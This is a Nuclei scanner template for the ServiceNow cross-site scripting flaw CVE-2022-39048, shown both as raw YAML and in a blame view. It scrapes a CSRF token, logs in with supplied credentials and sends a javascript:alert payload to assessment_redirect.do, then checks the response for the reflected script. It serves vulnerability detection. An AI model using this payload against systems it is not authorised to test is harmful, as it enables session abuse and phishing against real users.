nuclei-templates/http/cves/2022/CVE-2022-39048.yaml

id: CVE-2022-39048

info:
  name: ServiceNow - Cross-site Scripting
  author: theamanrawat
  severity: medium
  description: |
    A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.
  reference:
    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892
    - https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39048
    - https://support.servicenow.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-39048
    cwe-id: CWE-79
    epss-score: 0.00432
    epss-percentile: 0.71677
    cpe: cpe:2.3:a:servicenow:servicenow:quebec:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: servicenow
    product: servicenow
    shodan-query: http.title:"ServiceNow"
  tags: cve,cve2022,xss,servicenow,authenticated

http:
  - raw:
      - |
        GET /navpage.do HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /login.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do
      - |
        GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'
          - 'assessment_list.do'
        condition: and

      - type: word
        part: header_3
        words:
          - 'text/html'

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'
        internal: true
# digest: 4a0a0047304502203e8affbb747140b8ac717dab0cdd0e2999f59c313a537f1333db125ef1ca668b022100e5fcbc0388e694464eed2d1b9bfa1c128329dd12a114717be1111c79143efc67:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: CVE-2022-39048`

			`info:`
			`name: ServiceNow - Cross-site Scripting`
			`author: theamanrawat`
			`severity: medium`
			`description: \|`
			`A XSS vulnerability was identified in the ServiceNow UI page assessment_redirect. To exploit this vulnerability, an attacker would need to persuade an authenticated user to click a maliciously crafted URL. Successful exploitation potentially could be used to conduct various client-side attacks, including, but not limited to, phishing, redirection, theft of CSRF tokens, and use of an authenticated user's browser or session to attack other systems.`
			`reference:`
			`- https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1221892`
			`- https://blog.amanrawat.in/2023/05/05/CVE-2022-39048.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-39048`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`- https://support.servicenow.com/`
templates added 2023-10-17 07:20:28 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2022-39048`
			`cwe-id: CWE-79`
TemplateMan Update [Wed Oct 18 16:26:29 UTC 2023] :robot: 2023-10-18 16:26:30 +00:00			`epss-score: 0.00432`
TemplateMan Update [Thu Oct 26 18:00:24 UTC 2023] :robot: 2023-10-26 18:00:24 +00:00			`epss-percentile: 0.71677`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cpe: cpe:2.3:a:servicenow:servicenow:quebec:-::::::`
templates added 2023-10-17 07:20:28 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 3`
			`vendor: servicenow`
			`product: servicenow`
templates added 2023-10-17 07:20:28 +00:00			`shodan-query: http.title:"ServiceNow"`
			`tags: cve,cve2022,xss,servicenow,authenticated`

			`http:`
			`- raw:`
			`- \|`
			`GET /navpage.do HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /login.do HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`sysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do`
			`- \|`
			`GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00
templates added 2023-10-17 07:20:28 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- 'unwrapped_url = "javascript:alert(document.domain)//assessment_take2.do"'`
			`- 'assessment_list.do'`
			`condition: and`

			`- type: word`
			`part: header_3`
			`words:`
			`- 'text/html'`

			`- type: status`
			`part: header_3`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: csrf`
			`part: body`
			`group: 1`
			`regex:`
			`- 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"'`
			`internal: true`
Auto Template Signing [Fri Oct 27 06:32:23 UTC 2023] :robot: 2023-10-27 06:32:23 +00:00			`# digest: 4a0a0047304502203e8affbb747140b8ac717dab0cdd0e2999f59c313a537f1333db125ef1ca668b022100e5fcbc0388e694464eed2d1b9bfa1c128329dd12a114717be1111c79143efc67:922c64590222798bb761d5b6d8e72950`